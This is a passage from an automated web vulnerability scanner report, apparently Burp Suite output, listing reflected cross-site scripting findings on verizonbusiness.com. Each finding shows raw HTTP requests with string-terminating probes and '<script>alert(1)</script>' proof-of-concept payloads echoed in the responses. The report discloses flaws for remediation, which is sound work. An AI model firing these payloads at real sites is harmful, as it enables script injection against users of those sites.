Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Last-Modified: Wed, 17 Nov 2010 00:25:29 GMT
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Content-Type: text/html
Content-Length: 40662
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:25:29 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:25:29 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
<script type="text/javascript">
var request='/resourcesd1a91';333c0dd493c/1002a2a27-111-Think+Forward.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.655. http://www.verizonbusiness.com/resources/1002a2a27-111-Think+Forward.xml [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/1002a2a27-111-Think+Forward.xml

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5c60c'%3bad1b72eb2aa was submitted in the REST URL parameter 2. This input was echoed as 5c60c';ad1b72eb2aa in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources/5c60c'%3bad1b72eb2aa HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:26:46 GMT
Content-Type: text/html
Content-Length: 40210
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:26:46 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:26:46 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet"><link med
...[SNIP]...
<script type="text/javascript">
var request='/resources/5c60c';ad1b72eb2aa'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.656. http://www.verizonbusiness.com/resources/1002a2a27-111-Think+Forward.xml [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/1002a2a27-111-Think+Forward.xml

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3c142"%3b207d149bdb1 was submitted in the REST URL parameter 2. This input was echoed as 3c142";207d149bdb1 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources/3c142"%3b207d149bdb1 HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:26:14 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40210
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:26:14 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:26:14 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link hre
...[SNIP]...

} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/resources/3c142";207d149bdb1";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBMIT FUNCTION NAME

...[SNIP]...

1.657. http://www.verizonbusiness.com/resources/1002a2a28-111-Small+&+Medium+Business.xml [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/1002a2a28-111-Small+&+Medium+Business.xml

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2f546"%3bf08503057ae was submitted in the REST URL parameter 1. This input was echoed as 2f546";f08503057ae in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources2f546"%3bf08503057ae/1002a2a28-111-Small+&+Medium+Business.xml HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:23:51 GMT
Vary: User-Agent
Server: Roxen/4.5.146-release3
Content-Type: text/html
Content-Length: 40682
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:23:51 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:23:51 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link rel="stylesheet" href="/(15:46:12)/templates/vzbar/style.css" type="text/css"><link med
...[SNIP]...


} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/resources2f546";f08503057ae/1002a2a28-111-Small+&+Medium+Business.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION
...[SNIP]...

1.658. http://www.verizonbusiness.com/resources/1002a2a28-111-Small+&+Medium+Business.xml [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/1002a2a28-111-Small+&+Medium+Business.xml

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c4331'%3bf0c47aed74f was submitted in the REST URL parameter 1. This input was echoed as c4331';f0c47aed74f in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resourcesc4331'%3bf0c47aed74f/1002a2a28-111-Small+&+Medium+Business.xml HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:24:09 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40682
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:24:09 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:24:09 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link med
...[SNIP]...
<script type="text/javascript">
var request='/resourcesc4331';f0c47aed74f/1002a2a28-111-Small+&+Medium+Business.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.659. http://www.verizonbusiness.com/resources/1002a2a28-111-Small+&+Medium+Business.xml [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.verizonbusiness.com
Path:   /resources/1002a2a28-111-Small+&+Medium+Business.xml

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 389c0</script><script>alert(1)</script>d0f8cdbe771 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources/1002a2a28-111-Small+389c0</script><script>alert(1)</script>d0f8cdbe771&+Medium+Business.xml HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 200 OK
Server: Roxen/4.5.146-release3
ETag: "83d4c11a14741e60f58c33a236784469"
Last-Modified: Wed, 17 Nov 2010 00:24:59 GMT
Content-Type: text/html; charset=ISO-8859-1
Vary: User-Agent
Date: Wed, 17 Nov 2010 00:24:59 GMT
Content-Length: 28918
Connection: close
Expires: Mon, 16 Nov 2009 18:24:59 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
<url>/resources/1002a2a28-111-Small+389c0</script><script>alert(1)</script>d0f8cdbe771&+Medium+Business.xml</url>
...[SNIP]...

1.660. http://www.verizonbusiness.com/resources/1002a2a28-111-Small+&+Medium+Business.xml [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/1002a2a28-111-Small+&+Medium+Business.xml

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 24cd2'%3bc8de5ccdeab was submitted in the REST URL parameter 2. This input was echoed as 24cd2';c8de5ccdeab in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources/24cd2'%3bc8de5ccdeab&+Medium+Business.xml HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:25:01 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40252
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:25:01 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:25:01 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...
<script type="text/javascript">
var request='/resources/24cd2';c8de5ccdeab&+Medium+Business.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.661. http://www.verizonbusiness.com/resources/1002a2a29-111-Carrier+&+Wholesale.xml [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/1002a2a29-111-Carrier+&+Wholesale.xml

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d2858"%3b3467d7bb59d was submitted in the REST URL parameter 1. This input was echoed as d2858";3467d7bb59d in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resourcesd2858"%3b3467d7bb59d/1002a2a29-111-Carrier+&+Wholesale.xml HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:19:17 GMT
Content-Type: text/html
Content-Length: 40674
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:19:17 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:19:17 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet"><link med
...[SNIP]...


} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/resourcesd2858";3467d7bb59d/1002a2a29-111-Carrier+&+Wholesale.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MIN
...[SNIP]...

1.662. http://www.verizonbusiness.com/resources/1002a2a29-111-Carrier+&+Wholesale.xml [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/1002a2a29-111-Carrier+&+Wholesale.xml

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a65be'%3b7e01bf5e966 was submitted in the REST URL parameter 1. This input was echoed as a65be';7e01bf5e966 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resourcesa65be'%3b7e01bf5e966/1002a2a29-111-Carrier+&+Wholesale.xml HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:19:27 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40674
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:19:27 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:19:27 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link hre
...[SNIP]...
<script type="text/javascript">
var request='/resourcesa65be';7e01bf5e966/1002a2a29-111-Carrier+&+Wholesale.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.663. http://www.verizonbusiness.com/resources/1002a2a29-111-Carrier+&+Wholesale.xml [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.verizonbusiness.com
Path:   /resources/1002a2a29-111-Carrier+&+Wholesale.xml

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b2520</script><script>alert(1)</script>d7834bd2c8 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources/1002a2a29-111-Carrier+b2520</script><script>alert(1)</script>d7834bd2c8&+Wholesale.xml HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 200 OK
Server: Roxen/4.5.146-release3
ETag: "b9410a0e73e3ad608f6b4bd4be258f2d"
Last-Modified: Wed, 17 Nov 2010 00:21:01 GMT
Content-Type: text/html; charset=ISO-8859-1
Vary: User-Agent
Date: Wed, 17 Nov 2010 00:21:01 GMT
Content-Length: 29834
Connection: close
Expires: Mon, 16 Nov 2009 18:21:01 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link med
...[SNIP]...
<url>/resources/1002a2a29-111-Carrier+b2520</script><script>alert(1)</script>d7834bd2c8&+Wholesale.xml</url>
...[SNIP]...

1.664. http://www.verizonbusiness.com/resources/1002a2a29-111-Carrier+&+Wholesale.xml [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/1002a2a29-111-Carrier+&+Wholesale.xml

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cb666'%3b828307d0b65 was submitted in the REST URL parameter 2. This input was echoed as cb666';828307d0b65 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources/cb666'%3b828307d0b65&+Wholesale.xml HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:21:02 GMT
Vary: User-Agent
Server: Roxen/4.5.146-release3
Content-Type: text/html
Content-Length: 40240
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:21:02 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:21:02 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link rel="stylesheet" href="/(15:46:12)/templates/vzbar/style.css" type="text/css"><link med
...[SNIP]...
<script type="text/javascript">
var request='/resources/cb666';828307d0b65&+Wholesale.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.665. http://www.verizonbusiness.com/resources/1002a2a3-111-Contact+Centers.xml [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/1002a2a3-111-Contact+Centers.xml

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d331c'%3b72228b16e48 was submitted in the REST URL parameter 1. This input was echoed as d331c';72228b16e48 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resourcesd331c'%3b72228b16e48/1002a2a3-111-Contact+Centers.xml HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:20:03 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40666
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:20:03 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:20:03 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...
<script type="text/javascript">
var request='/resourcesd331c';72228b16e48/1002a2a3-111-Contact+Centers.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.666. http://www.verizonbusiness.com/resources/1002a2a3-111-Contact+Centers.xml [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/1002a2a3-111-Contact+Centers.xml

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a129a"%3be5305c22101 was submitted in the REST URL parameter 1. This input was echoed as a129a";e5305c22101 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resourcesa129a"%3be5305c22101/1002a2a3-111-Contact+Centers.xml HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:19:43 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40666
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:19:43 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:19:43 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...


} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/resourcesa129a";e5305c22101/1002a2a3-111-Contact+Centers.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM
...[SNIP]...

1.667. http://www.verizonbusiness.com/resources/1002a2a3-111-Contact+Centers.xml [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.verizonbusiness.com
Path:   /resources/1002a2a3-111-Contact+Centers.xml

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f36dc</script><script>alert(1)</script>c1ce810243 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources/1002a2a3-111-Contact+Centers.xmlf36dc</script><script>alert(1)</script>c1ce810243 HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 200 OK
